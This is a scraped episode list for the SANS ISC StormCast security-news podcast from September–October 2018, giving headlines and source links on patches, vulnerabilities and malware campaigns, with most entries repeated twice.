Oracle CPU https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html libssh vulnerability https://www.libssh.org/security/advisories/CVE-2018-10933.txt Vending Machine Mobile App Compromise https://hackernoon.com/how-i-hacked-modern-vending-machines-43f4ae8decec Browsers Announce Timeline to Discontinue TLS1.0/1.1 support https://blogs.windows.com/msedgedev/2018/10/15/modernizing-tls-edge-ie11/ https://security.googleblog.com/2018/10/modernizing-transport-security.html https://blog.mozilla.org/security/2018/10/15/removing-old-versions-of-tls/ https://webkit.org/blog/8462/deprecation-of-legacy-tls-1-0-and-1-1-versions/
10/17/20185 minutes, 42 seconds
Episode Artwork

ISC StormCast for Wednesday, October 17th 2018

Oracle CPU https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html libssh vulnerability https://www.libssh.org/security/advisories/CVE-2018-10933.txt Vending Machine Mobile App Compromise https://hackernoon.com/how-i-hacked-modern-vending-machines-43f4ae8decec Browsers Announce Timeline to Discontinue TLS1.0/1.1 support https://blogs.windows.com/msedgedev/2018/10/15/modernizing-tls-edge-ie11/ https://security.googleblog.com/2018/10/modernizing-transport-security.html https://blog.mozilla.org/security/2018/10/15/removing-old-versions-of-tls/ https://webkit.org/blog/8462/deprecation-of-legacy-tls-1-0-and-1-1-versions/
10/17/20185 minutes, 42 seconds
Episode Artwork

ISC StormCast for Tuesday, October 16th 2018

Proof Of Concept Exploit for Microsoft Edge Vulnerability CVE-2018-8495 https://leucosite.com/Microsoft-Edge-RCE/ Fake Mining Apps https://www.fortinet.com/blog/threat-research/fortinet-discovers-new-android-apps-that-mine-the-unminable.html Fake Google Photo App Turns out to be Ad-Clicker https://www.geeklatest.com/developer-tricks-microsoft-publishes-app-under-google-llc-name-in-windows-store/
10/16/20185 minutes, 34 seconds
Episode Artwork

ISC StormCast for Tuesday, October 16th 2018

Proof Of Concept Exploit for Microsoft Edge Vulnerability CVE-2018-8495 https://leucosite.com/Microsoft-Edge-RCE/ Fake Mining Apps https://www.fortinet.com/blog/threat-research/fortinet-discovers-new-android-apps-that-mine-the-unminable.html Fake Google Photo App Turns out to be Ad-Clicker https://www.geeklatest.com/developer-tricks-microsoft-publishes-app-under-google-llc-name-in-windows-store/
10/16/20185 minutes, 34 seconds
Episode Artwork

ISC StormCast for Monday, October 15th 2018

Many Large Websites Affected by Branch.io XSS Flaw https://www.vpnmentor.com/blog/dom-xss-bug-affecting-tinder-shopify-yelp/ Medtronics Pacemakers Disable Remote Update https://www.medtronic.com/content/dam/medtronic-com/us-en/corporate/documents/REV-Medtronic-2090-Security-Bulletin_FNL.pdf IBM Updates WebSphere Update https://www-01.ibm.com/support/docview.wss?uid=swg22016254 Incomplete JET Database Patch https://blog.0patch.com/2018/10/patching-re-patching-and-meta-patching.html
10/15/20186 minutes, 17 seconds
Episode Artwork

ISC StormCast for Monday, October 15th 2018

Many Large Websites Affected by Branch.io XSS Flaw https://www.vpnmentor.com/blog/dom-xss-bug-affecting-tinder-shopify-yelp/ Medtronics Pacemakers Disable Remote Update https://www.medtronic.com/content/dam/medtronic-com/us-en/corporate/documents/REV-Medtronic-2090-Security-Bulletin_FNL.pdf IBM Updates WebSphere Update https://www-01.ibm.com/support/docview.wss?uid=swg22016254 Incomplete JET Database Patch https://blog.0patch.com/2018/10/patching-re-patching-and-meta-patching.html
10/15/20186 minutes, 17 seconds
Episode Artwork

ISC StormCast for Friday, October 12th 2018

New Campaign Using Old Equation Editor Vulnerability https://isc.sans.edu/forums/diary/New+Campaign+Using+Old+Equation+Editor+Vulnerability/24196/ Root Access Vulnerability in SONY Smart TVs https://www.fortinet.com/blog/threat-research/sony-smart-tv-exploit-inside-view-hijacking-your-living-room.html MicroTik RouterOS Vulnerablities https://github.com/tenable/routeros/blob/master/bug_hunting_in_routeros_derbycon_2018.pdf Reverse Analysis of WebAssembly https://www.forcepoint.com/blog/security-labs/manual-reverse-engineering-webassembly-static-code-analysis Firefox Delays Symantec Certificate Distrust https://www.theregister.co.uk/2018/10/11/firefox_symantec_certs_delay/
10/11/20185 minutes, 51 seconds
Episode Artwork

ISC StormCast for Friday, October 12th 2018

New Campaign Using Old Equation Editor Vulnerability https://isc.sans.edu/forums/diary/New+Campaign+Using+Old+Equation+Editor+Vulnerability/24196/ Root Access Vulnerability in SONY Smart TVs https://www.fortinet.com/blog/threat-research/sony-smart-tv-exploit-inside-view-hijacking-your-living-room.html MicroTik RouterOS Vulnerablities https://github.com/tenable/routeros/blob/master/bug_hunting_in_routeros_derbycon_2018.pdf Reverse Analysis of WebAssembly https://www.forcepoint.com/blog/security-labs/manual-reverse-engineering-webassembly-static-code-analysis Firefox Delays Symantec Certificate Distrust https://www.theregister.co.uk/2018/10/11/firefox_symantec_certs_delay/
10/11/20185 minutes, 51 seconds
Episode Artwork

ISC StormCast for Thursday, October 11th 2018

Remote Code Execution Vulnerability in WhatsApp https://bugs.chromium.org/p/project-zero/issues/detail?id=1654 Salesforce Releases hashh Library https://github.com/salesforce/hassh CVE-2018-8453 Details from Kaspersky https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/ Juniper Patches https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES Experian Vulnerability Could Have Leaked Credit Freeze PINs https://www.nerdwallet.com/blog/finance/security-flaw-at-experian-allows-easy-access-to-pin-to-unlock-credit-freeze/
10/11/20186 minutes, 24 seconds
Episode Artwork

ISC StormCast for Thursday, October 11th 2018

Remote Code Execution Vulnerability in WhatsApp https://bugs.chromium.org/p/project-zero/issues/detail?id=1654 Salesforce Releases hashh Library https://github.com/salesforce/hassh CVE-2018-8453 Details from Kaspersky https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/ Juniper Patches https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES Experian Vulnerability Could Have Leaked Credit Freeze PINs https://www.nerdwallet.com/blog/finance/security-flaw-at-experian-allows-easy-access-to-pin-to-unlock-credit-freeze/
10/11/20186 minutes, 24 seconds
Episode Artwork

ISC StormCast for Wednesday, October 10th 2018

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/October+2018+Microsoft+Patch+Tuesday/24186/ Adobe Updates https://helpx.adobe.com/security.html Magecart Infects "Shopper Approved" Plugin https://www.riskiq.com/blog/labs/magecart-shopper-approved/
10/10/20185 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, October 10th 2018

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/October+2018+Microsoft+Patch+Tuesday/24186/ Adobe Updates https://helpx.adobe.com/security.html Magecart Infects "Shopper Approved" Plugin https://www.riskiq.com/blog/labs/magecart-shopper-approved/
10/10/20185 minutes, 31 seconds
Episode Artwork

ISC StormCast for Tuesday, October 9th 2018

Apple Updates iOS and iCloud for Windows https://support.apple.com/en-ca/HT209162 https://support.apple.com/en-ca/HT209141 Intel Adds Spectre/Meltdown Mitigation to 9th Generation CPUs https://www.bleepingcomputer.com/news/security/spectre-and-meltdown-hardware-protection-added-to-intels-9th-gen-cpus/ Windows October Update File Deleting Issues https://support.microsoft.com/en-us/help/4464619/windows-10-update-history https://blogs.technet.microsoft.com/filecab/2018/08/30/9205/ macOS Code Signing Vulnerabilities https://www.virusbulletin.com/conference/vb2018/abstracts/code-signing-flaw-macos
10/9/20184 minutes, 44 seconds
Episode Artwork

ISC StormCast for Tuesday, October 9th 2018

Apple Updates iOS and iCloud for Windows https://support.apple.com/en-ca/HT209162 https://support.apple.com/en-ca/HT209141 Intel Adds Spectre/Meltdown Mitigation to 9th Generation CPUs https://www.bleepingcomputer.com/news/security/spectre-and-meltdown-hardware-protection-added-to-intels-9th-gen-cpus/ Windows October Update File Deleting Issues https://support.microsoft.com/en-us/help/4464619/windows-10-update-history https://blogs.technet.microsoft.com/filecab/2018/08/30/9205/ macOS Code Signing Vulnerabilities https://www.virusbulletin.com/conference/vb2018/abstracts/code-signing-flaw-macos
10/9/20184 minutes, 44 seconds
Episode Artwork

ISC StormCast for Monday, October 8th 2018

WPA2 Karck Attack Update https://www.krackattacks.com/followup.html#overview Cisco Updates https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir#~Vulnerabilities Seattle Police Tries to Stop SWATing https://www.seattle.gov/police/need-help/swatting git Vulnerability Fixed https://github.com/timwr/CVE-2017-1000117
10/8/20186 minutes, 53 seconds
Episode Artwork

ISC StormCast for Monday, October 8th 2018

WPA2 Karck Attack Update https://www.krackattacks.com/followup.html#overview Cisco Updates https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir#~Vulnerabilities Seattle Police Tries to Stop SWATing https://www.seattle.gov/police/need-help/swatting git Vulnerability Fixed https://github.com/timwr/CVE-2017-1000117
10/8/20186 minutes, 53 seconds
Episode Artwork

ISC StormCast for Friday, October 5th 2018

Does the Chinese Military Manipulate Supermicro Motherboards? https://www.bloomberg.com/news/articles/2018-10-04/the-big-hack-amazon-apple-supermicro-and-beijing-respond Cloudflare IPFS Gateway Used For Phishing https://www.bleepingcomputer.com/news/security/phishing-attacks-distributed-through-cloudflares-ipfs-gateway/ DNSSEC Root Key Signing Key Rollover https://www.icann.org/resources/pages/ksk-rollover https://www.icann.org/news/blog/2018-ksk-rollover-operator-preparedness-survey
10/5/20187 minutes, 18 seconds
Episode Artwork

ISC StormCast for Friday, October 5th 2018

Does the Chinese Military Manipulate Supermicro Motherboards? https://www.bloomberg.com/news/articles/2018-10-04/the-big-hack-amazon-apple-supermicro-and-beijing-respond Cloudflare IPFS Gateway Used For Phishing https://www.bleepingcomputer.com/news/security/phishing-attacks-distributed-through-cloudflares-ipfs-gateway/ DNSSEC Root Key Signing Key Rollover https://www.icann.org/resources/pages/ksk-rollover https://www.icann.org/news/blog/2018-ksk-rollover-operator-preparedness-survey
10/5/20187 minutes, 18 seconds
Episode Artwork

ISC StormCast for Thursday, October 4th 2018

Identifying a Phisher https://isc.sans.edu/forums/diary/Identifying+a+phisher/24164/ Phishing via Azure Blob Storage https://www.netskope.com/blog/phishing-in-the-public-cloud Zoho Domains Used for Phishing and Keyloggers https://cofense.com/staggering-amount-stolen-data-heading-zoho-domains/ Dell iDRAC Exploit https://www.servethehome.com/idracula-vulnerability-impacts-millions-of-legacy-dell-emc-servers/
10/4/20186 minutes
Episode Artwork

ISC StormCast for Thursday, October 4th 2018

Identifying a Phisher https://isc.sans.edu/forums/diary/Identifying+a+phisher/24164/ Phishing via Azure Blob Storage https://www.netskope.com/blog/phishing-in-the-public-cloud Zoho Domains Used for Phishing and Keyloggers https://cofense.com/staggering-amount-stolen-data-heading-zoho-domains/ Dell iDRAC Exploit https://www.servethehome.com/idracula-vulnerability-impacts-millions-of-legacy-dell-emc-servers/
10/4/20186 minutes
Episode Artwork

ISC StormCast for Wednesday, October 3rd 2018

How to Write Yara Rules https://isc.sans.edu/forums/diary/Developing+YARA+Rules+a+Practical+Example/24158/ GhostDNS DNS Changer Malware https://blog.netlab.360.com/70-different-types-of-home-routers-all-together-100000-are-being-hijacked-by-ghostdns-en/ Foxit PDF Reader Vulnerabilities https://www.foxitsoftware.com/support/security-bulletins.php Apple Laptops Shipped With CPU in Manufacturing Mode http://blog.ptsecurity.com/2018/10/intel-me-manufacturing-mode-macbook.html
10/3/20185 minutes, 11 seconds
Episode Artwork

ISC StormCast for Wednesday, October 3rd 2018

How to Write Yara Rules https://isc.sans.edu/forums/diary/Developing+YARA+Rules+a+Practical+Example/24158/ GhostDNS DNS Changer Malware https://blog.netlab.360.com/70-different-types-of-home-routers-all-together-100000-are-being-hijacked-by-ghostdns-en/ Foxit PDF Reader Vulnerabilities https://www.foxitsoftware.com/support/security-bulletins.php Apple Laptops Shipped With CPU in Manufacturing Mode http://blog.ptsecurity.com/2018/10/intel-me-manufacturing-mode-macbook.html
10/3/20185 minutes, 11 seconds
Episode Artwork

ISC StormCast for Tuesday, October 2nd 2018

Update About Facebook Breach https://newsroom.fb.com/news/2018/09/security-update/ Adobe Acrobat/Reader Update https://helpx.adobe.com/security/products/acrobat/apsb18-30.html SMTP MTA Strict Transport Security (MTA-STS) https://www.rfc-editor.org/rfc/rfc8461.txt
10/2/20186 minutes, 10 seconds
Episode Artwork

ISC StormCast for Tuesday, October 2nd 2018

Update About Facebook Breach https://newsroom.fb.com/news/2018/09/security-update/ Adobe Acrobat/Reader Update https://helpx.adobe.com/security/products/acrobat/apsb18-30.html SMTP MTA Strict Transport Security (MTA-STS) https://www.rfc-editor.org/rfc/rfc8461.txt
10/2/20186 minutes, 10 seconds
Episode Artwork

ISC StormCast for Monday, October 1st 2018

Facebook Leaks more than 50 Million Accounts https://newsroom.fb.com/news/2018/09/security-update/ Telegram Leaks Local IP Address By Default https://www.inputzero.io/2018/09/bug-bounty-telegram-cve-2018-17780.html Site Tricks Users Into Subscribing to Browser Notifications https://www.bleepingcomputer.com/news/security/sites-trick-users-into-subscribing-to-browser-notification-spam/ DDE Code Injection https://isc.sans.edu/forums/diary/More+Excel+DDE+Code+Injection/24150/
10/1/20186 minutes, 11 seconds
Episode Artwork

ISC StormCast for Monday, October 1st 2018

Facebook Leaks more than 50 Million Accounts https://newsroom.fb.com/news/2018/09/security-update/ Telegram Leaks Local IP Address By Default https://www.inputzero.io/2018/09/bug-bounty-telegram-cve-2018-17780.html Site Tricks Users Into Subscribing to Browser Notifications https://www.bleepingcomputer.com/news/security/sites-trick-users-into-subscribing-to-browser-notification-spam/ DDE Code Injection https://isc.sans.edu/forums/diary/More+Excel+DDE+Code+Injection/24150/
10/1/20186 minutes, 11 seconds
Episode Artwork

ISC StormCast for Friday, September 28th 2018

Enriching Radare2 and x64dbg malware analysis with statically decoded strings https://isc.sans.edu/forums/diary/Enriching+Radare2+and+x64dbg+malware+analysis+with+statically+decoded+strings/24146/ Weaknesses in Apple's Mobile Device Management https://duo.com/labs/research/mdm-me-maybe LoJax UEFI Rootkit https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/
9/28/20185 minutes, 34 seconds
Episode Artwork

ISC StormCast for Friday, September 28th 2018

Enriching Radare2 and x64dbg malware analysis with statically decoded strings https://isc.sans.edu/forums/diary/Enriching+Radare2+and+x64dbg+malware+analysis+with+statically+decoded+strings/24146/ Weaknesses in Apple's Mobile Device Management https://duo.com/labs/research/mdm-me-maybe LoJax UEFI Rootkit https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/
9/28/20185 minutes, 34 seconds
Episode Artwork

ISC StormCast for Thursday, September 27th 2018

Emotet Malware Delivery Service Update https://isc.sans.edu/forums/diary/One+Emotet+infection+leads+to+three+followup+malware+infections/24140/ Fedora Crypto Policy Update Causes SSH Issues https://bugzilla.redhat.com/show_bug.cgi?id=1631970 Android Banking Trojan Impersonates QRecorder https://lukasstefanko.com/2018/09/banking-trojan-found-on-google-play-stole-10000-euros-from-victims.html Google Reverts Changes to Chrome https://www.blog.google/products/chrome/product-updates-based-your-feedback/amp/
9/27/20185 minutes, 2 seconds
Episode Artwork

ISC StormCast for Thursday, September 27th 2018

Emotet Malware Delivery Service Update https://isc.sans.edu/forums/diary/One+Emotet+infection+leads+to+three+followup+malware+infections/24140/ Fedora Crypto Policy Update Causes SSH Issues https://bugzilla.redhat.com/show_bug.cgi?id=1631970 Android Banking Trojan Impersonates QRecorder https://lukasstefanko.com/2018/09/banking-trojan-found-on-google-play-stole-10000-euros-from-victims.html Google Reverts Changes to Chrome https://www.blog.google/products/chrome/product-updates-based-your-feedback/amp/
9/27/20185 minutes, 2 seconds
Episode Artwork

ISC StormCast for Wednesday, September 26th 2018

Firefox Haveibeenpwned Monitor https://blog.mozilla.org/blog/2018/09/25/introducing-firefox-monitor-helping-people-take-control-after-a-data-breach/ Chrome 69 Privacy Issues https://www.bleepingcomputer.com/news/google/chrome-69-keeps-googles-cookies-after-you-clear-browser-data/ Cisco FragmentSmack Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180824-linux-ip-fragment Micorsoft Bitlocker Turns itself Off During Updates https://social.technet.microsoft.com/Forums/en-US/0e48536f-40ff-4046-bd08-ed4a39b4840f/bitlocker-automatically-suspending-during-updates?forum=win10itprosecurity
9/26/20185 minutes, 4 seconds
Episode Artwork

ISC StormCast for Wednesday, September 26th 2018

Firefox Haveibeenpwned Monitor https://blog.mozilla.org/blog/2018/09/25/introducing-firefox-monitor-helping-people-take-control-after-a-data-breach/ Chrome 69 Privacy Issues https://www.bleepingcomputer.com/news/google/chrome-69-keeps-googles-cookies-after-you-clear-browser-data/ Cisco FragmentSmack Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180824-linux-ip-fragment Micorsoft Bitlocker Turns itself Off During Updates https://social.technet.microsoft.com/Forums/en-US/0e48536f-40ff-4046-bd08-ed4a39b4840f/bitlocker-automatically-suspending-during-updates?forum=win10itprosecurity
9/26/20185 minutes, 4 seconds
Episode Artwork

ISC StormCast for Tuesday, September 25th 2018

More Sextortion Emails https://isc.sans.edu/forums/diary/Sextortion+Spam+and+the+Infinite+Monkey+Theorem/24136/ MacOS 10.14 (Mojahve) Security Fixes https://support.apple.com/en-us/HT209139 Mojave Privacy Protection Bypass https://vimeo.com/291491984 Cloudflare Supporting Encrypted SNI https://blog.cloudflare.com/esni/
9/25/20185 minutes, 56 seconds
Episode Artwork

ISC StormCast for Tuesday, September 25th 2018

More Sextortion Emails https://isc.sans.edu/forums/diary/Sextortion+Spam+and+the+Infinite+Monkey+Theorem/24136/ MacOS 10.14 (Mojahve) Security Fixes https://support.apple.com/en-us/HT209139 Mojave Privacy Protection Bypass https://vimeo.com/291491984 Cloudflare Supporting Encrypted SNI https://blog.cloudflare.com/esni/
9/25/20185 minutes, 56 seconds
Episode Artwork

ISC StormCast for Monday, September 24th 2018

Odd DNS Requests from Firewalls https://isc.sans.edu/forums/diary/Suspicious+DNS+Requests+Issued+by+a+Firewall/24128/ Securing API Connections https://isc.sans.edu/forums/diary/The+danger+of+sending+information+for+API+consumption+without+adequate+security+measures/24130/ Microsoft JET Database 0day https://www.zerodayinitiative.com/advisories/ZDI-18-1075/ Western Digital Releases Patch for MyCloud Drives https://support.wdc.com/knowledgebase/answer.aspx?ID=25952&s Job Offers With Malware Attachment https://www.bleepingcomputer.com/news/security/malware-disguised-as-job-offers-distributed-on-freelance-sites/
9/24/20184 minutes, 30 seconds
Episode Artwork

ISC StormCast for Monday, September 24th 2018

Odd DNS Requests from Firewalls https://isc.sans.edu/forums/diary/Suspicious+DNS+Requests+Issued+by+a+Firewall/24128/ Securing API Connections https://isc.sans.edu/forums/diary/The+danger+of+sending+information+for+API+consumption+without+adequate+security+measures/24130/ Microsoft JET Database 0day https://www.zerodayinitiative.com/advisories/ZDI-18-1075/ Western Digital Releases Patch for MyCloud Drives https://support.wdc.com/knowledgebase/answer.aspx?ID=25952&s Job Offers With Malware Attachment https://www.bleepingcomputer.com/news/security/malware-disguised-as-job-offers-distributed-on-freelance-sites/
9/24/20184 minutes, 30 seconds
Episode Artwork

ISC StormCast for Friday, September 21st 2018

Hunting for Suspicious Processes with OSSEC https://isc.sans.edu/forums/diary/Hunting+for+Suspicious+Processes+with+OSSEC/24122/ NSSLabs Sues Crowdstrike, Symantec, ESET https://www.nsslabs.com/blog/company/advancing-transparency-and-accountability-in-the-cybersecurity-industry/ Bitcoin Core Vulnerability https://motherboard.vice.com/amp/en_us/article/qvakp3/a-major-bug-in-bitcoin-software-could-have-crashed-the-currency?__twitter_impression=true WebAuthn Standard https://paragonie.com/blog/2018/08/security-concerns-surrounding-webauthn-don-t-implement-ecdaa-yet https://fidoalliance.org/
9/21/201812 minutes, 33 seconds
Episode Artwork

ISC StormCast for Friday, September 21st 2018

Hunting for Suspicious Processes with OSSEC https://isc.sans.edu/forums/diary/Hunting+for+Suspicious+Processes+with+OSSEC/24122/ NSSLabs Sues Crowdstrike, Symantec, ESET https://www.nsslabs.com/blog/company/advancing-transparency-and-accountability-in-the-cybersecurity-industry/ Bitcoin Core Vulnerability https://motherboard.vice.com/amp/en_us/article/qvakp3/a-major-bug-in-bitcoin-software-could-have-crashed-the-currency?__twitter_impression=true WebAuthn Standard https://paragonie.com/blog/2018/08/security-concerns-surrounding-webauthn-don-t-implement-ecdaa-yet https://fidoalliance.org/
9/21/201812 minutes, 33 seconds
Episode Artwork

ISC StormCast for Thursday, September 20th 2018

Adobe Releases Special Patch for Acrobat and Reader https://helpx.adobe.com/security/products/acrobat/apsb18-34.html Akamai State of the Internet Report https://www.akamai.com/us/en/about/our-thinking/state-of-the-internet-report/global-state-of-the-internet-security-ddos-attack-reports.jsp Peekabo DVR Vulnerability https://www.tenable.com/blog/tenable-research-advisory-peekaboo-critical-vulnerability-in-nuuo-network-video-recorder
9/20/20185 minutes, 24 seconds
Episode Artwork

ISC StormCast for Thursday, September 20th 2018

Adobe Releases Special Patch for Acrobat and Reader https://helpx.adobe.com/security/products/acrobat/apsb18-34.html Akamai State of the Internet Report https://www.akamai.com/us/en/about/our-thinking/state-of-the-internet-report/global-state-of-the-internet-security-ddos-attack-reports.jsp Peekabo DVR Vulnerability https://www.tenable.com/blog/tenable-research-advisory-peekaboo-critical-vulnerability-in-nuuo-network-video-recorder
9/20/20185 minutes, 24 seconds
Episode Artwork

ISC StormCast for Wednesday, September 19th 2018

Certificate Transparency Tools https://isc.sans.edu/forums/diary/Using+Certificate+Transparency+as+an+Attack+Defense+Tool/24114/ Kodi Malicious Add-Ons https://www.welivesecurity.com/2018/09/13/kodi-add-ons-launch-cryptomining-campaign/ Cloudflare Making DNSSEC Adoption Easier https://blog.cloudflare.com/automatically-provision-and-maintain-dnssec/ Western Digital MyCloud Unauthenticated Admin Access https://www.securify.nl/advisory/SFY20180102/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges.html
9/19/20185 minutes, 27 seconds
Episode Artwork

ISC StormCast for Wednesday, September 19th 2018

Certificate Transparency Tools https://isc.sans.edu/forums/diary/Using+Certificate+Transparency+as+an+Attack+Defense+Tool/24114/ Kodi Malicious Add-Ons https://www.welivesecurity.com/2018/09/13/kodi-add-ons-launch-cryptomining-campaign/ Cloudflare Making DNSSEC Adoption Easier https://blog.cloudflare.com/automatically-provision-and-maintain-dnssec/ Western Digital MyCloud Unauthenticated Admin Access https://www.securify.nl/advisory/SFY20180102/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges.html
9/19/20185 minutes, 27 seconds
Episode Artwork

ISC StormCast for Tuesday, September 18th 2018

Analyzing Office Docs https://isc.sans.edu/forums/diary/Dissecting+Malicious+MS+Office+Docs/24108/ Apple Updates Everything but macOS https://support.apple.com/en-us/HT201220 FBot Botnet https://blog.netlab.360.com/threat-alert-a-new-worm-fbot-cleaning-adbminer-is-using-a-blockchain-based-dns-en/ Related STI Paper: Botnet Reciliency via Private Blockchain (Jonathan Sweeny) https://www.sans.org/reading-room/whitepapers/covert/botnet-resiliency-private-blockchains-38050
9/18/20185 minutes, 26 seconds
Episode Artwork

ISC StormCast for Tuesday, September 18th 2018

Analyzing Office Docs https://isc.sans.edu/forums/diary/Dissecting+Malicious+MS+Office+Docs/24108/ Apple Updates Everything but macOS https://support.apple.com/en-us/HT201220 FBot Botnet https://blog.netlab.360.com/threat-alert-a-new-worm-fbot-cleaning-adbminer-is-using-a-blockchain-based-dns-en/ Related STI Paper: Botnet Reciliency via Private Blockchain (Jonathan Sweeny) https://www.sans.org/reading-room/whitepapers/covert/botnet-resiliency-private-blockchains-38050
9/18/20185 minutes, 26 seconds
Episode Artwork

ISC StormCast for Monday, September 17th 2018

Reversing Visual Basic Shortcuts https://isc.sans.edu/forums/diary/2020+malware+vision/24104/ Not So Random User Agent https://isc.sans.edu/forums/diary/User+Agent+String+uatoolsrandom/24102/ Safari DoS https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea Webroot SecureAnywhere macOS Vulnerability https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2018-16962--Webroot-SecureAnywhere-macOS-Kernel-Level-Memory-Corruption/ Intel Patches Management Engine Encryption Vulnerability http://blog.ptsecurity.com/2018/09/intel-me-encryption-vulnerability.html
9/17/20185 minutes, 26 seconds
Episode Artwork

ISC StormCast for Monday, September 17th 2018

Reversing Visual Basic Shortcuts https://isc.sans.edu/forums/diary/2020+malware+vision/24104/ Not So Random User Agent https://isc.sans.edu/forums/diary/User+Agent+String+uatoolsrandom/24102/ Safari DoS https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea Webroot SecureAnywhere macOS Vulnerability https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2018-16962--Webroot-SecureAnywhere-macOS-Kernel-Level-Memory-Corruption/ Intel Patches Management Engine Encryption Vulnerability http://blog.ptsecurity.com/2018/09/intel-me-encryption-vulnerability.html
9/17/20185 minutes, 26 seconds
Episode Artwork

ISC StormCast for Friday, September 14th 2018

Malicious MHT Files https://isc.sans.edu/forums/diary/Malware+Delivered+Through+MHT+Files/24096/ Improved Coldboot Attack https://blog.f-secure.com/cold-boot-attacks/ SAP Patches https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=499356993
9/14/20185 minutes, 37 seconds
Episode Artwork

ISC StormCast for Friday, September 14th 2018

Malicious MHT Files https://isc.sans.edu/forums/diary/Malware+Delivered+Through+MHT+Files/24096/ Improved Coldboot Attack https://blog.f-secure.com/cold-boot-attacks/ SAP Patches https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=499356993
9/14/20185 minutes, 37 seconds
Episode Artwork

ISC StormCast for Thursday, September 13th 2018

So What is Going on With IPv4 Fragments these Days? https://isc.sans.edu/forums/diary/So+What+is+Going+on+With+IPv4+Fragments+these+Days/24092/ Magacart Javascript Injection Attacks https://www.bleepingcomputer.com/news/security/feedify-service-compromised-with-magecart-information-stealing-script/ Bypassing CSP using Polyglot JPEGs https://portswigger.net/blog/bypassing-csp-using-polyglot-jpegs
9/13/20186 minutes, 47 seconds
Episode Artwork

ISC StormCast for Thursday, September 13th 2018

So What is Going on With IPv4 Fragments these Days? https://isc.sans.edu/forums/diary/So+What+is+Going+on+With+IPv4+Fragments+these+Days/24092/ Magacart Javascript Injection Attacks https://www.bleepingcomputer.com/news/security/feedify-service-compromised-with-magecart-information-stealing-script/ Bypassing CSP using Polyglot JPEGs https://portswigger.net/blog/bypassing-csp-using-polyglot-jpegs
9/13/20186 minutes, 47 seconds
Episode Artwork

ISC StormCast for Wednesday, September 12th 2018

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+September+Patch+Tuesday+Summary/24088/ Adobe Patches https://helpx.adobe.com/security.html Safari/Edge URL Bar Spoofing https://www.rafaybaloch.com/2018/09/apple-safari-microsoft-edge-browser.html Exploit Search Engine https://sploitus.com
9/12/20184 minutes, 44 seconds
Episode Artwork

ISC StormCast for Wednesday, September 12th 2018

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+September+Patch+Tuesday+Summary/24088/ Adobe Patches https://helpx.adobe.com/security.html Safari/Edge URL Bar Spoofing https://www.rafaybaloch.com/2018/09/apple-safari-microsoft-edge-browser.html Exploit Search Engine https://sploitus.com
9/12/20184 minutes, 44 seconds
Episode Artwork

ISC StormCast for Tuesday, September 11th 2018

"findstr" used to extract malware from LNK files https://isc.sans.edu/forums/diary/What+is+dikona+or+glirote3/24084/ Tor Browser Javascript Vulnerability https://www.bleepingcomputer.com/news/security/exploit-affecting-tor-browser-burned-in-a-tweet/ Trend Micro App Leaks Data / Removed from Appstore https://forums.malwarebytes.com/topic/217353-get-rid-of-open-any-files-rar-support/?tab=comments#comment-1194838 Chrome removes Subdomains from URL Bar https://bugs.chromium.org/p/chromium/issues/detail?id=881410
9/10/20184 minutes, 46 seconds
Episode Artwork

ISC StormCast for Tuesday, September 11th 2018

"findstr" used to extract malware from LNK files https://isc.sans.edu/forums/diary/What+is+dikona+or+glirote3/24084/ Tor Browser Javascript Vulnerability https://www.bleepingcomputer.com/news/security/exploit-affecting-tor-browser-burned-in-a-tweet/ Trend Micro App Leaks Data / Removed from Appstore https://forums.malwarebytes.com/topic/217353-get-rid-of-open-any-files-rar-support/?tab=comments#comment-1194838 Chrome removes Subdomains from URL Bar https://bugs.chromium.org/p/chromium/issues/detail?id=881410
9/10/20184 minutes, 46 seconds
Episode Artwork

ISC StormCast for Sunday, September 9th 2018

Crypto Mining in a Windows Headless Browser https://isc.sans.edu/forums/diary/Crypto+Mining+in+a+Windows+Headless+Browser/24078/ MacOS Adware Doctor Stealing Browser History https://twitter.com/privacyis1st/status/1031428304543395840 https://objective-see.com/blog/blog_0x37.html VPN Applications with Privilege Escalation Vulnerabilities https://blog.talosintelligence.com/2018/09/vulnerability-spotlight-Multi-provider-VPN-Client-Privilege-Escalation.html Keybase Extension Allws Access By Scripts from Any Site https://palant.de/2018/09/06/keybase-our-browser-extension-subverts-our-encryption-but-why-should-we-care
9/9/20186 minutes, 33 seconds
Episode Artwork

ISC StormCast for Sunday, September 9th 2018

Crypto Mining in a Windows Headless Browser https://isc.sans.edu/forums/diary/Crypto+Mining+in+a+Windows+Headless+Browser/24078/ MacOS Adware Doctor Stealing Browser History https://twitter.com/privacyis1st/status/1031428304543395840 https://objective-see.com/blog/blog_0x37.html VPN Applications with Privilege Escalation Vulnerabilities https://blog.talosintelligence.com/2018/09/vulnerability-spotlight-Multi-provider-VPN-Client-Privilege-Escalation.html Keybase Extension Allws Access By Scripts from Any Site https://palant.de/2018/09/06/keybase-our-browser-extension-subverts-our-encryption-but-why-should-we-care
9/9/20186 minutes, 33 seconds
Episode Artwork

ISC StormCast for Friday, September 7th 2018
